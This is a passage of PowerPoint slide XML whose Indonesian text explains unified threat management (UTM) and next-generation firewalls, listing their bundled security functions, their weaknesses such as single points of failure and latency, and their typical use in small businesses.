              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencegahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intrusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesadaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Integrasi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpadu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (UTM) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memusatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - firewall, antimalware, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencegahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyusupan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemfilteran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> spam, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemfilteran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencegahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kehilangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> virtual (VPN), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gerbang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akhir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> malware - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemantauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengelolaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beragam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonsolidasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Namun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>demikian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, UTM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ketika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disatukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bawah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menciptakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memengaruhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gagal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membahayakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jalur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> UTM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengalami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>latensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengalami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, UTM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bekerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebaik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sampai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> batas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, NGFW dan UTM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanyalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istilah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemasaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. UTM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kecil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menengah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komprehensif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keahlian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbatas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. UTM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipandang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pakai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segalanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> NGFW </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
